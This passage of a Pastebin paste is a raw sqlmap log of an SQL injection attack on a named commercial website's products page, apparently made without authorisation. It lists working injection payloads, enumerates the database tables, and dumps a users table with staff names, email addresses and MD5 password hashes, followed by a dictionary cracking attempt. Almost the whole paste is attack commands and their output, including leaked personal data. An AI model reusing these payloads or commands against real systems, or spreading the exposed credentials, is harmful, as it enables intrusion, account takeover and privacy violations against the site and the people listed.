  649. +-----------+--------------+
  650.  
  651. Database: artefarma_bdsqlartefarma
  652. Table: usuario
  653. [4 columns]
  654. +---------+--------------+
  655. | Column | Type |
  656. +---------+--------------+
  657. | usu_cod | int(11) |
  658. | usu_nom | varchar(45) |
  659. | usu_pwd | varchar(500) |
  660. | usu_tip | int(11) |
  661. +---------+--------------+
  662.  
  663. Database: artefarma_bdsqlartefarma
  664. Table: arquivos
  665. [4 columns]
  666. +---------+--------------+
  667. | Column | Type |
  668. +---------+--------------+
  669. | arquivo | varchar(200) |
  670. | id | int(11) |
  671. | nome | varchar(200) |
  672. | pasta | int(11) |
  673. +---------+--------------+
  674.  
  675. Database: artefarma_bdsqlartefarma
  676. Table: upload
  677. [5 columns]
  678. +---------+-------------+
  679. | Column | Type |
  680. +---------+-------------+
  681. | size | int(11) |
  682. | content | mediumblob |
  683. | id | int(11) |
  684. | name | varchar(45) |
  685. | type | varchar(45) |
  686. +---------+-------------+
  687.  
  688. Database: artefarma_bdsqlartefarma
  689. Table: paghome
  690. [5 columns]
  691. +--------------------+--------------+
  692. | Column | Type |
  693. +--------------------+--------------+
  694. | id | int(11) |
  695. | imgDestaque | varchar(100) |
  696. | janelaLinkDestaque | varchar(6) |
  697. | linkDestaque | varchar(300) |
  698. | textoDestaque | varchar(200) |
  699. +--------------------+--------------+
  700.  
  701. [00:09:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  702.  
  703. [*] shutting down at 00:09:43
  704.  
  705. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -C usu_cod,usu_nom,usu_pwd,usu_tip --tables
  706.  
  707. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  708. http://sqlmap.org
  709.  
  710. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  711.  
  712. [*] starting at 00:11:35
  713.  
  714. [00:11:35] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  715. Are you sure you want to continue? [y/N] y
  716. [00:11:37] [INFO] resuming back-end DBMS 'mysql'
  717. [00:11:37] [INFO] testing connection to the target URL
  718. [00:11:37] [INFO] heuristics detected web page charset 'ascii'
  719. [00:11:37] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  720. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  721. ---
  722. Place: GET
  723. Parameter: id
  724. Type: boolean-based blind
  725. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  726. Payload: id=-4224 OR (8424=8424)#
  727.  
  728. Type: error-based
  729. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  730. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  731.  
  732. Type: UNION query
  733. Title: MySQL UNION query (random number) - 4 columns
  734. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  735.  
  736. Type: AND/OR time-based blind
  737. Title: MySQL > 5.0.11 OR time-based blind
  738. Payload: id=-4593 OR 5414=SLEEP(5)
  739. ---
  740. [00:11:37] [INFO] the back-end DBMS is MySQL
  741. web server operating system: Windows 2008 R2 or 7
  742. web application technology: ASP.NET, Microsoft IIS 7.5
  743. back-end DBMS: MySQL 5.0
  744. [00:11:37] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
  745. [00:11:37] [INFO] the SQL query used returns 25 entries
  746. Database: artefarma_bdsqlartefarma
  747. [25 tables]
  748. +--------------------------+
  749. | arquivos |
  750. | clientes |
  751. | contato |
  752. | faq |
  753. | galeriahome |
  754. | galeriainstitucional |
  755. | galeriaprodutos |
  756. | galeriaprojetosespeciais |
  757. | log_acesso |
  758. | loja |
  759. | loja_imagem |
  760. | n_emails |
  761. | noticias |
  762. | pagclientes |
  763. | pagcontato |
  764. | paghome |
  765. | paginstitucional |
  766. | pagorcamento |
  767. | pastas |
  768. | produto |
  769. | produtos |
  770. | projetosespeciais |
  771. | upload |
  772. | usuario |
  773. | usuarios |
  774. +--------------------------+
  775.  
  776. [00:11:37] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  777.  
  778. [*] shutting down at 00:11:37
  779.  
  780. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -C usu_cod,usu_nom,usu_pwd,usu_tip --tables
  781.  
  782. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  783. http://sqlmap.org
  784.  
  785. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  786.  
  787. [*] starting at 00:12:30
  788.  
  789. [00:12:30] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  790. Are you sure you want to continue? [y/N] y
  791. [00:12:32] [INFO] resuming back-end DBMS 'mysql'
  792. [00:12:37] [INFO] testing connection to the target URL
  793. [00:12:43] [INFO] heuristics detected web page charset 'ascii'
  794. [00:12:43] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  795. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  796. ---
  797. Place: GET
  798. Parameter: id
  799. Type: boolean-based blind
  800. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  801. Payload: id=-4224 OR (8424=8424)#
  802.  
  803. Type: error-based
  804. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  805. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  806.  
  807. Type: UNION query
  808. Title: MySQL UNION query (random number) - 4 columns
  809. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  810.  
  811. Type: AND/OR time-based blind
  812. Title: MySQL > 5.0.11 OR time-based blind
  813. Payload: id=-4593 OR 5414=SLEEP(5)
  814. ---
  815. [00:12:43] [INFO] the back-end DBMS is MySQL
  816. web server operating system: Windows 2008 R2 or 7
  817. web application technology: ASP.NET, Microsoft IIS 7.5
  818. back-end DBMS: MySQL 5.0
  819. [00:12:43] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
  820. [00:12:43] [INFO] the SQL query used returns 25 entries
  821. Database: artefarma_bdsqlartefarma
  822. [25 tables]
  823. +--------------------------+
  824. | arquivos |
  825. | clientes |
  826. | contato |
  827. | faq |
  828. | galeriahome |
  829. | galeriainstitucional |
  830. | galeriaprodutos |
  831. | galeriaprojetosespeciais |
  832. | log_acesso |
  833. | loja |
  834. | loja_imagem |
  835. | n_emails |
  836. | noticias |
  837. | pagclientes |
  838. | pagcontato |
  839. | paghome |
  840. | paginstitucional |
  841. | pagorcamento |
  842. | pastas |
  843. | produto |
  844. | produtos |
  845. | projetosespeciais |
  846. | upload |
  847. | usuario |
  848. | usuarios |
  849. +--------------------------+
  850.  
  851. [00:12:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  852.  
  853. [*] shutting down at 00:12:43
  854.  
  855. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuario,usuarios --columns
  856.  
  857. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  858. http://sqlmap.org
  859.  
  860. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  861.  
  862. [*] starting at 00:14:41
  863.  
  864. [00:14:41] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  865. Are you sure you want to continue? [y/N] y
  866. [00:14:42] [INFO] resuming back-end DBMS 'mysql'
  867. [00:14:42] [INFO] testing connection to the target URL
  868. [00:14:43] [INFO] heuristics detected web page charset 'ascii'
  869. [00:14:43] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  870. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  871. ---
  872. Place: GET
  873. Parameter: id
  874. Type: boolean-based blind
  875. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  876. Payload: id=-4224 OR (8424=8424)#
  877.  
  878. Type: error-based
  879. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  880. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  881.  
  882. Type: UNION query
  883. Title: MySQL UNION query (random number) - 4 columns
  884. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  885.  
  886. Type: AND/OR time-based blind
  887. Title: MySQL > 5.0.11 OR time-based blind
  888. Payload: id=-4593 OR 5414=SLEEP(5)
  889. ---
  890. [00:14:43] [INFO] the back-end DBMS is MySQL
  891. web server operating system: Windows 2008 R2 or 7
  892. web application technology: ASP.NET, Microsoft IIS 7.5
  893. back-end DBMS: MySQL 5.0
  894. [00:14:43] [INFO] fetching columns for table 'usuario' in database 'artefarma_bdsqlartefarma'
  895. [00:14:43] [INFO] the SQL query used returns 4 entries
  896. [00:14:43] [INFO] resumed: "usu_cod","int(11)","usu_cod","int(11)","usu_cod","int(11)","usu_cod","int(11)"
  897. [00:14:43] [INFO] resumed: "usu_nom","varchar(45)","usu_nom","varchar(45)","usu_nom","varchar(45)","usu_nom","varchar(45)"
  898. [00:14:43] [INFO] resumed: "usu_pwd","varchar(500)","usu_pwd","varchar(500)","usu_pwd","varchar(500)","usu_pwd","varchar(500)"
  899. [00:14:43] [INFO] resumed: "usu_tip","int(11)","usu_tip","int(11)","usu_tip","int(11)","usu_tip","int(11)"
  900. [00:14:44] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  901. [00:14:44] [INFO] the SQL query used returns 4 entries
  902. [00:14:44] [INFO] resumed: "id","int(11)","id","int(11)","id","int(11)","id","int(11)"
  903. [00:14:44] [INFO] resumed: "nome","varchar(200)","nome","varchar(200)","nome","varchar(200)","nome","varchar(200)"
  904. [00:14:44] [INFO] resumed: "login","varchar(100)","login","varchar(100)","login","varchar(100)","login","varchar(100)"
  905. [00:14:44] [INFO] resumed: "senha","varchar(300)","senha","varchar(300)","senha","varchar(300)","senha","varchar(300)"
  906. Database: artefarma_bdsqlartefarma
  907. Table: usuarios
  908. [4 columns]
  909. +--------+--------------+
  910. | Column | Type |
  911. +--------+--------------+
  912. | id | int(11) |
  913. | login | varchar(100) |
  914. | nome | varchar(200) |
  915. | senha | varchar(300) |
  916. +--------+--------------+
  917.  
  918. Database: artefarma_bdsqlartefarma
  919. Table: usuario
  920. [4 columns]
  921. +---------+--------------+
  922. | Column | Type |
  923. +---------+--------------+
  924. | usu_cod | int(11) |
  925. | usu_nom | varchar(45) |
  926. | usu_pwd | varchar(500) |
  927. | usu_tip | int(11) |
  928. +---------+--------------+
  929.  
  930. [00:14:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  931.  
  932. [*] shutting down at 00:14:44
  933.  
  934. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuario -C id,login,nome,senha --dump
  935.  
  936. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  937. http://sqlmap.org
  938.  
  939. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  940.  
  941. [*] starting at 00:15:14
  942.  
  943. [00:15:14] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  944. Are you sure you want to continue? [y/N] y
  945. [00:15:15] [INFO] resuming back-end DBMS 'mysql'
  946. [00:15:15] [INFO] testing connection to the target URL
  947. [00:15:15] [INFO] heuristics detected web page charset 'ascii'
  948. [00:15:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  949. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  950. ---
  951. Place: GET
  952. Parameter: id
  953. Type: boolean-based blind
  954. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  955. Payload: id=-4224 OR (8424=8424)#
  956.  
  957. Type: error-based
  958. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  959. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  960.  
  961. Type: UNION query
  962. Title: MySQL UNION query (random number) - 4 columns
  963. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  964.  
  965. Type: AND/OR time-based blind
  966. Title: MySQL > 5.0.11 OR time-based blind
  967. Payload: id=-4593 OR 5414=SLEEP(5)
  968. ---
  969. [00:15:16] [INFO] the back-end DBMS is MySQL
  970. web server operating system: Windows 2008 R2 or 7
  971. web application technology: ASP.NET, Microsoft IIS 7.5
  972. back-end DBMS: MySQL 5.0
  973. [00:15:16] [INFO] fetching columns 'id, login, nome, senha' for table 'usuario' in database 'artefarma_bdsqlartefarma'
  974. [00:15:16] [WARNING] reflective value(s) found and filtering out
  975. [00:15:16] [WARNING] unable to retrieve column names for table 'usuario' in database 'artefarma_bdsqlartefarma'
  976. [00:15:16] [INFO] fetching entries of column(s) 'id, login, nome, senha' for table 'usuario' in database 'artefarma_bdsqlartefarma'
  977. [00:15:16] [INFO] the SQL query used returns 3 entries
  978. [00:15:18] [INFO] the SQL query used returns 3 entries
  979. [00:15:20] [INFO] fetching number of column(s) 'id, login, nome, senha' entries for table 'usuario' in database 'artefarma_bdsqlartefarma'
  980. [00:15:20] [INFO] resumed: 3
  981. [00:15:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  982. [00:15:20] [INFO] retrieved: 477
  983. [00:15:33] [INFO] retrieved:
  984. [00:16:02] [INFO] retrieved:
  985. [00:16:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
  986. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
  987. !
  988. [00:16:19] [INFO] retrieved:
  989. [00:16:54] [INFO] retrieved:
  990. [00:16:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  991. [00:16:56] [INFO] retrieved:
  992. [00:18:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
  993.  
  994. [00:18:49] [INFO] retrieved:
  995. [00:18:54] [INFO] retrieved: 477
  996. [00:19:34] [INFO] retrieved:
  997. [00:20:12] [INFO] retrieved:
  998. [00:20:13] [INFO] retrieved:
  999. [00:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
  1000.  
  1001. [00:21:08] [INFO] retrieved:
  1002. [00:21:10] [INFO] retrieved:
  1003. [00:21:40] [INFO] retrieved:
  1004. [00:21:47] [INFO] retrieved: 477
  1005. [00:22:49] [INFO] retrieved:
  1006. [00:24:02] [INFO] retrieved:
  1007. [00:24:05] [INFO] retrieved:
  1008. [00:25:24] [INFO] retrieved:
  1009. [00:25:28] [INFO] retrieved:
  1010. [00:26:54] [INFO] retrieved:
  1011. [00:26:57] [INFO] analyzing table dump for possible password hashes
  1012. Database: artefarma_bdsqlartefarma
  1013. Table: usuario
  1014. [3 entries]
  1015. +-----+---------+---------+---------+
  1016. | id | nome | login | senha |
  1017. +-----+---------+---------+---------+
  1018. | 477 | <blank> | !\x03 | <blank> |
  1019. | 477 | <blank> | <blank> | <blank> |
  1020. | 477 | <blank> | <blank> | <blank> |
  1021. +-----+---------+---------+---------+
  1022.  
  1023. [00:26:57] [INFO] table 'artefarma_bdsqlartefarma.usuario' dumped to CSV file '/usr/share/sqlmap/output/www.artefarma.com/dump/artefarma_bdsqlartefarma/usuario.csv'
  1024. [00:26:57] [WARNING] HTTP error codes detected during run:
  1025. 500 (Internal Server Error) - 31 times
  1026. [00:26:57] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  1027.  
  1028. [*] shutting down at 00:26:57
  1029.  
  1030. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuarios --columns
  1031.  
  1032. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  1033. http://sqlmap.org
  1034.  
  1035. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1036.  
  1037. [*] starting at 00:29:49
  1038.  
  1039. [00:29:49] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  1040. Are you sure you want to continue? [y/N] y
  1041. [00:29:50] [INFO] resuming back-end DBMS 'mysql'
  1042. [00:29:50] [INFO] testing connection to the target URL
  1043. [00:29:53] [INFO] heuristics detected web page charset 'ascii'
  1044. [00:29:53] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  1045. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1046. ---
  1047. Place: GET
  1048. Parameter: id
  1049. Type: boolean-based blind
  1050. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  1051. Payload: id=-4224 OR (8424=8424)#
  1052.  
  1053. Type: error-based
  1054. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  1055. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  1056.  
  1057. Type: UNION query
  1058. Title: MySQL UNION query (random number) - 4 columns
  1059. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  1060.  
  1061. Type: AND/OR time-based blind
  1062. Title: MySQL > 5.0.11 OR time-based blind
  1063. Payload: id=-4593 OR 5414=SLEEP(5)
  1064. ---
  1065. [00:29:53] [INFO] the back-end DBMS is MySQL
  1066. web server operating system: Windows 2008 R2 or 7
  1067. web application technology: ASP.NET, Microsoft IIS 7.5
  1068. back-end DBMS: MySQL 5.0
  1069. [00:29:53] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  1070. [00:29:53] [INFO] the SQL query used returns 4 entries
  1071. [00:29:53] [INFO] resumed: "id","int(11)","id","int(11)","id","int(11)","id","int(11)"
  1072. [00:29:53] [INFO] resumed: "nome","varchar(200)","nome","varchar(200)","nome","varchar(200)","nome","varchar(200)"
  1073. [00:29:53] [INFO] resumed: "login","varchar(100)","login","varchar(100)","login","varchar(100)","login","varchar(100)"
  1074. [00:29:53] [INFO] resumed: "senha","varchar(300)","senha","varchar(300)","senha","varchar(300)","senha","varchar(300)"
  1075. Database: artefarma_bdsqlartefarma
  1076. Table: usuarios
  1077. [4 columns]
  1078. +--------+--------------+
  1079. | Column | Type |
  1080. +--------+--------------+
  1081. | id | int(11) |
  1082. | login | varchar(100) |
  1083. | nome | varchar(200) |
  1084. | senha | varchar(300) |
  1085. +--------+--------------+
  1086.  
  1087. [00:29:53] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  1088.  
  1089. [*] shutting down at 00:29:53
  1090.  
  1091. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuarios -C id,login,nome,senha --dump
  1092.  
  1093. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  1094. http://sqlmap.org
  1095.  
  1096. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1097.  
  1098. [*] starting at 00:30:19
  1099.  
  1100. [00:30:19] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  1101. Are you sure you want to continue? [y/N] y
  1102. [00:30:20] [INFO] resuming back-end DBMS 'mysql'
  1103. [00:30:24] [INFO] testing connection to the target URL
  1104. [00:30:25] [INFO] heuristics detected web page charset 'ascii'
  1105. [00:30:25] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  1106. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1107. ---
  1108. Place: GET
  1109. Parameter: id
  1110. Type: boolean-based blind
  1111. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  1112. Payload: id=-4224 OR (8424=8424)#
  1113.  
  1114. Type: error-based
  1115. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  1116. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  1117.  
  1118. Type: UNION query
  1119. Title: MySQL UNION query (random number) - 4 columns
  1120. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  1121.  
  1122. Type: AND/OR time-based blind
  1123. Title: MySQL > 5.0.11 OR time-based blind
  1124. Payload: id=-4593 OR 5414=SLEEP(5)
  1125. ---
  1126. [00:30:25] [INFO] the back-end DBMS is MySQL
  1127. web server operating system: Windows 2008 R2 or 7
  1128. web application technology: ASP.NET, Microsoft IIS 7.5
  1129. back-end DBMS: MySQL 5.0
  1130. [00:30:25] [INFO] fetching columns 'id, login, nome, senha' for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  1131. [00:30:27] [WARNING] reflective value(s) found and filtering out
  1132. [00:30:27] [INFO] the SQL query used returns 4 entries
  1133. [00:30:34] [INFO] retrieved: "id","int(11)"
  1134. [00:30:35] [INFO] retrieved: "nome","varchar(200)"
  1135. [00:30:36] [INFO] retrieved: "login","varchar(100)"
  1136. [00:30:37] [INFO] retrieved: "senha","varchar(300)"
  1137. [00:30:37] [INFO] fetching entries of column(s) 'id, login, nome, senha' for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  1138. [00:30:38] [INFO] the SQL query used returns 3 entries
  1139. [00:30:39] [INFO] retrieved: "7","jeffe@artefarma.com","jefferson","5cd3f50a183e55a6ac34d18601a70c05"
  1140. [00:30:40] [INFO] retrieved: "8","fabiene@artefarma.com","Fabiene","5cd3f50a183e55a6ac34d18601a70c05"
  1141. [00:30:40] [INFO] retrieved: "9","solange@activadigital.com.br","solange","5cd3f50a183e55a6ac34d18601a70c05"
  1142. [00:30:41] [INFO] analyzing table dump for possible password hashes
  1143. [00:30:41] [INFO] recognized possible password hashes in column 'senha'
  1144. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
  1145. [00:30:47] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-U9JueC.txt'
  1146. do you want to crack them via a dictionary-based attack? [Y/n/q] Y
  1147. [00:30:49] [INFO] using hash method 'md5_generic_passwd'
  1148. what dictionary do you want to use?
  1149. [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
  1150. [2] custom dictionary file
  1151. [3] file with list of dictionary files
  1152. >
  1153. [00:30:52] [INFO] using default dictionary
  1154. do you want to use common password suffixes? (slow!) [y/N] y
  1155. [00:30:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
  1156. [00:30:53] [INFO] starting 4 processes
  1157. [00:44:52] [INFO] using suffix '1'
  1158. [00:45:00] [INFO] using suffix '123'
  1159. [00:45:08] [INFO] using suffix '2'
  1160. [00:45:16] [INFO] using suffix '12'
  1161. [00:45:23] [INFO] using suffix '3'
  1162. [00:45:31] [INFO] using suffix '13'
  1163. [00:45:38] [INFO] using suffix '7'
  1164. [00:45:46] [INFO] using suffix '11'
  1165. [00:45:53] [INFO] using suffix '5'
  1166. [00:46:17] [INFO] using suffix '22'
  1167. [00:46:24] [INFO] using suffix '23'
  1168. [00:46:31] [INFO] using suffix '01'
  1169. [00:46:39] [INFO] using suffix '4'
  1170. [00:46:46] [INFO] using suffix '07'
  1171. [00:47:09] [INFO] using suffix '21'
  1172. [00:47:16] [INFO] using suffix '14'
  1173. [00:47:23] [INFO] using suffix '10'
  1174. [00:47:30] [INFO] using suffix '06'
  1175. [00:47:37] [INFO] using suffix '08'
  1176. [00:47:45] [INFO] using suffix '8'
  1177. [00:47:52] [INFO] using suffix '15'
  1178. [00:47:59] [INFO] using suffix '69'
  1179. [00:48:06] [INFO] using suffix '16'
  1180. [00:48:13] [INFO] using suffix '6'
  1181. [00:48:21] [INFO] using suffix '18'
  1182. [00:48:29] [INFO] using suffix '!'
  1183. [00:48:37] [INFO] using suffix '.'
  1184. [00:48:45] [INFO] using suffix '*'
  1185. [00:48:52] [INFO] using suffix '!!'
  1186. [00:48:59] [INFO] using suffix '?'
  1187. [00:49:07] [INFO] using suffix ';'
  1188. [00:49:14] [INFO] using suffix '..'
  1189. [00:49:21] [INFO] using suffix '!!!'
  1190. [00:49:28] [INFO] using suffix ', '
  1191. [00:49:35] [INFO] using suffix '@'
  1192. [00:49:43] [WARNING] no clear password(s) found
  1193. [00:49:43] [INFO] postprocessing table dump
  1194. Database: artefarma_bdsqlartefarma
  1195. Table: usuarios
  1196. [3 entries]
  1197. +----+-----------+------------------------------+----------------------------------+
  1198. | id | nome | login | senha |
  1199. +----+-----------+------------------------------+----------------------------------+
  1200. | 7 | jefferson | jeffe@artefarma.com | 5cd3f50a183e55a6ac34d18601a70c05 |
  1201. | 8 | Fabiene | fabiene@artefarma.com | 5cd3f50a183e55a6ac34d18601a70c05 |
  1202. | 9 | solange | solange@activadigital.com.br | 5cd3f50a183e55a6ac34d18601a70c05 |
  1203. +----+-----------+------------------------------+----------------------------------+
  1204.  
  1205. [00:49:43] [INFO] table 'artefarma_bdsqlartefarma.usuarios' dumped to CSV file '/usr/share/sqlmap/output/www.artefarma.com/dump/artefarma_bdsqlartefarma/usuarios.csv'
  1206. [00:49:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  1207.  
  1208. [*] shutting down at 00:49:43
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!